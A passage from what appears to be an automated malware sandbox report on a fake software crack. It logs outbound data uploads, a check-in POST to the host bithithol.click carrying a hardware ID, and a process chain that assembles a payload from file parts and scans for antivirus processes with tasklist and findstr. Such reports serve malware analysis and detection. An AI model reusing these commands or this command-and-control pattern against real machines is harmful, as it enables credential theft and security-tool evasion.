                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 67 c7 3a a5 35 4d c9 15 ce 70 94 88 d0 ab 99 d2 e9 f4 79 fd 00 38 27 b9 20 ef 60 8f d4 6d 4a d2 51 a2 80 94 8b ba 41 06 27 e7 20 25 11 3b 5a 8e df bd ef 3a ce a0 b2 ed 75 10 77 fd c5 03 94 7e 2e bf e3 e3 7c f7 1a ff f9 2a 1b 93 38 53 af 2d f6 ea a0 04 fd 64 c6 b3 2b d3 be 5e 5b 47 ef 34 9e db 3b 10 90 c4 92 5a fd 38 f4 b4 2e f7 d3 4b ed a9 81 16 d7 90 f1 0b 33 a9 12 29 95 92 97 88 f1 dc 8b dc 61 be e0 2f 3a 2f be 53 9a 71 f5 92 de 81 82 b7 9d a9 c9 69 d8 26 6b ed fc 98 d8 16 9d 6e 63 ff 96 56 d9 40 e6 af c5 0e 14 21 68 f3 e0 f2 b7 1f a2 51 64 97 a2 ef ee d5 6d 5e 85 89 62 2b 13 9a 66 7b ab 48 aa 58 1d cf eb 37 98 ef 3a 4e 33 02 6f 09 c0 ad 7d 93 f3 8f 89 43 e1 46 0c a5 ff 4c f5 ca 26 8e 7a 5e 0b f4 2e 2d b1 31 ff 97 79 ed 53 46 9a 1a ca 3c ca 2c 91 af 82
                                                                                                                Data Ascii: g:5Mpy8' `mJQA' %;Z:uw~.|*8S-d+^[G4;Z8.K3)a/:/Sqi&kncV@!hQdm^b+f{HX7:N3o}CFL&z^.-1ySF<,
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 5a 98 c4 bf 77 41 91 07 a4 e5 a8 d0 e4 8d 38 65 26 98 94 ca 56 c7 30 b4 83 67 a1 f1 2c ac cc cc 05 21 8b 52 07 a4 70 50 ad f5 93 13 57 32 22 3c 41 93 c3 2d b3 e9 5c 27 c3 7a 74 aa e0 d1 20 49 be 37 c6 76 fd 91 9b 9a 69 31 17 8c 2c 16 b7 e7 7d 2e 79 d4 07 f9 8e 49 33 6c 3d 6a fb 44 9a 83 52 6b cb 51 e4 34 7e 6b b1 31 b1 81 fd 2f 54 73 3b f6 15 06 4d ee 5f b4 ef 26 32 65 84 f7 30 8a 0a db 5a 09 b3 37 08 4f cb 22 2e ac d6 36 15 d4 99 07 6d bc 1e bd fe c0 7f c7 e9 c4 e1 8a 2f 15 02 9b 11 5c 93 89 9d ff 1a 86 95 ee 45 ac ba 33 3d 39 74 51 87 52 96 85 98 6b 2c cd 87 f9 92 95 a4 4d 18 b6 f0 d1 1f db b0 4f f6 cc ca 48 83 9a f6 50 8c 3d 09 ed a2 17 10 54 60 0a 62 56 44 c9 ed ba a8 9a 69 ab 6b 22 14 55 a3 89 02 21 d4 2b 50 18 fa 73 fd 41 9d 61 03 bc 29 9d 9e 44 02
                                                                                                                Data Ascii: ZwA8e&V0g,!RpPW2"<A-\'zt I7vi1,}.yI3l=jDRkQ4~k1/Ts;M_&2e0Z7O".6m/\E3=9tQRk,MOHP=T`bVDik"U!+PsAa)D
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 62 17 8b 5b 13 ed 59 a3 55 83 1b ad 33 12 61 cc 38 4a da a7 29 cd f1 dd df 18 05 7f 3d 53 64 1b ff 60 fe e8 7a 19 e4 b1 49 48 bd 34 3f a5 3f ac ef 09 72 5d 38 23 0c ca 63 83 c5 1e 3f 69 a6 0f 58 48 7c 38 d6 8b fc bf 03 d2 a4 ba 56 b7 4e 76 16 7d 78 57 97 a2 56 ee 4e f1 b7 0f c3 ff bc 2b 80 43 ac 40 eb 10 f3 78 c9 54 d2 73 c5 d8 5f e1 ae 62 6b f8 24 93 63 29 47 d4 8b 46 c6 82 95 90 b7 ae 1f fa 3f e3 d5 b8 de f1 5d 24 77 ad 66 23 61 05 d4 25 40 b3 16 0b ec d8 ee 9f 6f 42 7d ab a3 ee 82 68 7c 49 f7 da 5c 32 4b 13 43 1c 58 29 be 45 52 07 a0 73 35 c7 2a 82 2a 41 77 60 3b 3c ee 53 bb b4 99 45 b4 6c 9b 08 2e c0 ee 4a e4 d8 bc 47 5b c7 19 7c 44 35 98 f9 6d c5 02 5b 90 2b 42 6a 84 ed f7 63 f9 8e 91 b5 a8 01 5b 3c fd df c5 73 7d 40 50 e1 3d a2 ec 46 c9 7d 52 9d 21
                                                                                                                Data Ascii: b[YU3a8J)=Sd`zIH4??r]8#c?iXH|8VNv}xWVN+C@xTs_bk$c)GF?]$wf#a%@oB}h|I\2KCX)ERs5**Aw`;<SEl.JG[|D5m[+Bjc[<s}@P=F}R!
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: e2 13 8a 39 21 b1 8b fe f5 1b f6 aa 9c 0e 46 ec fd 3d eb a2 46 bf 59 03 42 74 e4 d4 70 b1 06 6b a6 9f e0 37 7f d9 2c 2b 4d 37 d6 8f 9d da ab 1f 26 f1 fb d7 9f fa ee 4a ca fb 26 3f 5e 15 ad cf 7f 72 70 38 fa bd a4 c4 dd 4a 51 be 0f 15 6c 86 f9 7a 9a 7a 8a 4e 04 88 cf 5c 84 8e f5 1d 70 1f 17 3a a3 06 50 e4 c8 e9 6d 5c 2d 52 37 74 77 1c 8b 14 17 b8 de d9 56 91 ba e2 d2 b6 0b 18 6c fc 58 58 46 ac 23 57 90 cc 65 37 5e c4 15 fb 8b ef 2f 61 cc a3 b0 eb 17 14 13 b7 72 1c ce b7 6c d4 3f 76 79 b7 22 bf 95 a0 66 d7 fb ec 67 0e 3e 31 53 a5 ae e8 87 46 37 98 c7 02 ef 3f 55 f1 68 ab 6f 9c 9f ba 70 a0 f0 e0 77 af 73 9b 1a 2b 5b 9b c1 a4 0c 42 5e f2 e0 e0 ef e5 d0 58 82 c6 01 40 8b ac 91 56 1a fc e7 33 2b 7c d0 dd b8 c6 82 d2 c6 21 3c a2 3c b8 be b9 7b c1 6c 3f bd de c7
                                                                                                                Data Ascii: 9!F=FYBtpk7,+M7&J&?^rp8JQlzzN\p:Pm\-R7twVlXXF#We7^/arl?vy"fg>1SF7?Uhopws+[B^X@V3+|!<<{l?
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 6d bc c6 fa 81 87 ac d0 6e e5 d7 e6 a8 62 24 2f 72 48 28 d5 ba fb 1c 59 a0 a0 57 81 44 6f 0e b2 8d d4 2f f2 2e e5 e8 ab 06 1b 21 6a eb 78 a5 1e 5d c7 f2 8d f2 07 5b ec 15 e9 3f 7c a4 5f e2 b0 50 e6 fc 3f f1 bd 23 0d ab a9 ca e4 7b ca 34 0d 0c e0 ff c6 75 59 de d3 df d0 a8 d1 3c a0 ca b8 7a f3 2f e1 dd ab 5c 53 89 88 1f 72 10 02 42 c3 88 fc bb 10 43 56 b8 b5 82 fd 77 30 e5 59 0c ac b7 17 17 51 6c 01 e1 3b 79 d8 2f f8 8b f4 96 82 bd 24 d6 45 50 a2 6c ee cf f0 ae 61 a1 8b 7c 9b 81 af ed 9f ff ad 81 f0 d1 e0 00 76 23 6b 0b 07 39 de e5 51 b6 99 19 72 24 b3 9e 1e 11 31 ff 6a 2a 86 aa 13 c1 de 38 c6 b5 97 a3 42 f5 f4 93 86 9f 45 47 9f be 81 6a f4 ab a3 9c b4 0d 9f 44 bd c4 02 1f 72 52 9b 04 b0 d9 9b 85 20 78 48 f2 30 f3 82 f0 98 76 6d f6 59 61 c1 c4 4f 86 15 6c
                                                                                                                Data Ascii: mnb$/rH(YWDo/.!jx][?|_P?#{4uY<z/\SrBCVw0YQl;y/$EPla|v#k9Qr$1j*8BEGjDrR xH0vmYaOl
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 5d 36 6a e3 d0 e0 cf 79 91 43 bd b1 5e 87 c6 f8 71 ae ce 75 be fc 6f b3 13 ef 55 ff c5 11 4a a3 44 05 56 16 16 59 28 d7 cb c8 8e c9 d4 ec c8 cc 04 c4 ca 2d 5f 89 cc 9b 3f 38 55 81 f7 68 16 17 ef a2 83 93 72 40 d2 6e c5 78 26 02 2c 09 74 2d b6 b8 92 f7 41 6f 20 f6 9f 67 70 c5 ef e3 04 bd 8d 7d e3 f7 b6 08 a9 fa 43 9c 91 fe f1 df a3 fd 92 06 28 e6 0f aa da 18 94 2e a1 44 bf eb 8f 2d 67 55 51 ff b0 9d 12 bf f6 27 fe 5e cb dd 9a b6 57 0c a0 30 4a f7 f6 bf f2 0a ed 67 ad 08 2b fa 10 82 bf 3a 43 28 76 75 0c 4c 46 b0 d7 85 15 c8 94 8d ad 80 aa 79 36 87 32 19 e6 bd c2 37 ee b9 49 4d ad fa 6c 4a eb fb 3d ec 94 89 81 03 3e 0d d4 d3 08 6b 74 ae 31 5d a1 3f f8 a7 fb f7 88 03 75 dc 5e 01 51 f3 73 20 a0 1b 5a 96 00 05 8e d4 df d5 53 59 4f f4 7a 40 66 e5 e7 cb 5b 7e 1f
                                                                                                                Data Ascii: ]6jyC^quoUJDVY(-_?8Uhr@nx&,t-Ao gp}C(.D-gUQ'^W0Jg+:C(vuLFy627IMlJ=>kt1]?u^Qs ZSYOz@f[~
                                                                                                                2024-12-24 12:52:59 UTC1138INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:59 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=lk8j1brc55efevdm79nnt8qugv; expires=Sat, 19 Apr 2025 06:39:38 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oos8%2F%2BQTkgeZJsXxgc2IAbl29ezTJO%2FoZCnfNK8Fd9ZvBsan1OEx1lm9V32c2m1wvtCXtxKcg08%2FESU8I%2FkFy%2BLNc3iqWCrh1AlXGWWPXC1U7i07XfF4UV51ON4z4S3XRwg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb3ccdbcc434-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2576&min_rtt=1649&rtt_var=1281&sent=310&recv=579&lost=0&retrans=0&sent_bytes=2835&recv_bytes=561454&delivery_rate=1770770&cwnd=196&unsent_bytes=0&cid=2db4056f97fc23e9&ts=3260&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.449743104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:53:00 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 82
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:53:00 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 26 6a 3d 26 68 77 69 64 3d 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37
                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=VvQOXN--dozp1&j=&hwid=D7E4F212D74998E6165F70E3262EAA47
                                                                                                                2024-12-24 12:53:01 UTC1132INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:53:01 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=rqmcuma7mthhiojs14mopo77tq; expires=Sat, 19 Apr 2025 06:39:40 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z7%2FcVK%2B%2FZVA2o2pLFHUBH3Oqt2Lue2aGqsIrZuCQnLVZPG%2BXfoz1Mi0aKK05Phgs%2FG7w45orcT2E3aiRpq%2Fx6Aqdis%2BVwY8Mg2otsL8TxnF%2FNBNorGCemndeIefqY1KCzzs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb597917437f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1616&rtt_var=628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=981&delivery_rate=1711606&cwnd=79&unsent_bytes=0&cid=fa4287faa32d2f46&ts=887&x=0"
                                                                                                                2024-12-24 12:53:01 UTC54INData Raw: 33 30 0d 0a 6c 2b 77 47 31 44 59 6f 62 4f 4c 35 7a 56 6d 72 53 46 4a 56 57 31 4d 53 77 65 31 4d 6d 57 50 72 70 52 62 66 4c 57 50 32 55 49 33 4d 73 51 3d 3d 0d 0a
                                                                                                                Data Ascii: 30l+wG1DYobOL5zVmrSFJVW1MSwe1MmWPrpRbfLWP2UI3MsQ==
                                                                                                                2024-12-24 12:53:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:07:52:14
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:927'079'465 bytes
                                                                                                                MD5 hash:636555B743CE6AEB326544EB56E8B5E9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:07:52:15
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:07:52:16
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:tasklist
                                                                                                                Imagebase:0x30000
                                                                                                                File size:79'360 bytes
                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:findstr /I "opssvc wrsa"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:29'696 bytes
                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:tasklist
                                                                                                                Imagebase:0x30000
                                                                                                                File size:79'360 bytes
                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:6
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:29'696 bytes
                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:cmd /c md 459250
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:findstr /V "Sorry" Branches
                                                                                                                Imagebase:0x240000
                                                                                                                File size:29'696 bytes
                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:Spa.com y
                                                                                                                Imagebase:0x450000
                                                                                                                File size:947'288 bytes
                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:07:52:19
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:choice /d y /t 5
                                                                                                                Imagebase:0x6a0000
                                                                                                                File size:28'160 bytes
                                                                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                No disassembly